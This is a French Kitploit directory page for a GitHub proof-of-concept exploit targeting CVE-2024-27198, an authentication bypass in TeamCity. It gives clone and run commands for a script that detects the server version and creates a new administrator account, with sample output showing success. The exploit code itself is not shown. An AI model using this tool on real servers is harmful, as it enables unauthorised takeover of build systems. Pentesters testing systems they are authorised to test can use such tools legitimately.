Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-27198 — est un outil PoC qui cible une vulnérabilité dans le serveur TeamCity (CVE-2024-27198) | Kitploit
Outils/GitHubGitHub/geniuszly/cve-2024-27198
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubgeniuszly/cve-2024-27198

CVE-2024-27198

est un outil PoC qui cible une vulnérabilité dans le serveur TeamCity (CVE-2024-27198)

Voir le dépôt
32il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

FR

GenTeamCityExploit est un outil PoC qui cible une vulnérabilité du serveur TeamCity (CVE-2024-27198). Il permet de détecter la version de TeamCity et de créer un nouvel utilisateur administrateur en exploitant une faille de contournement d’authentification.

Fonctionnalités

  • Extrait la version du serveur TeamCity.
  • Vérifie la présence d’une vulnérabilité connue (CVE-2024-27198).
  • Crée un nouvel utilisateur administrateur si le serveur est vulnérable.

Prérequis

  • Python 3.6+ : Assurez-vous d’avoir Python installé.
  • Bibliothèques : Installez les bibliothèques requises en utilisant :
    root@kitploit:~
    pip install requests urllib3
    

Utilisation

  1. Clonez le dépôt.
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2024-27198
    
  2. Accédez au répertoire.
    root@kitploit:~
    cd CVE-2024-27198
    
  3. Lancez le script avec les paramètres requis.
    root@kitploit:~
    python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
    
    Paramètres :
    • -t, --target : L’URL du serveur TeamCity cible.
    • -u, --username : Le nom d’utilisateur pour le nouvel administrateur.
    • -p, --password : Le mot de passe pour le nouvel administrateur.

Exemple

root@kitploit:~
python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

Exemple de sortie

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.

Si le serveur n’est pas vulnérable ou si la version n’est pas trouvée :

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403

En cas d’erreur de connexion au serveur :

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123

[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))

Avertissement

Cet outil est destiné uniquement à des fins éducatives et ne doit pas être utilisé sur des systèmes sans autorisation explicite de leur propriétaire. L’accès non autorisé aux systèmes informatiques est illégal.

Télécharger l’outil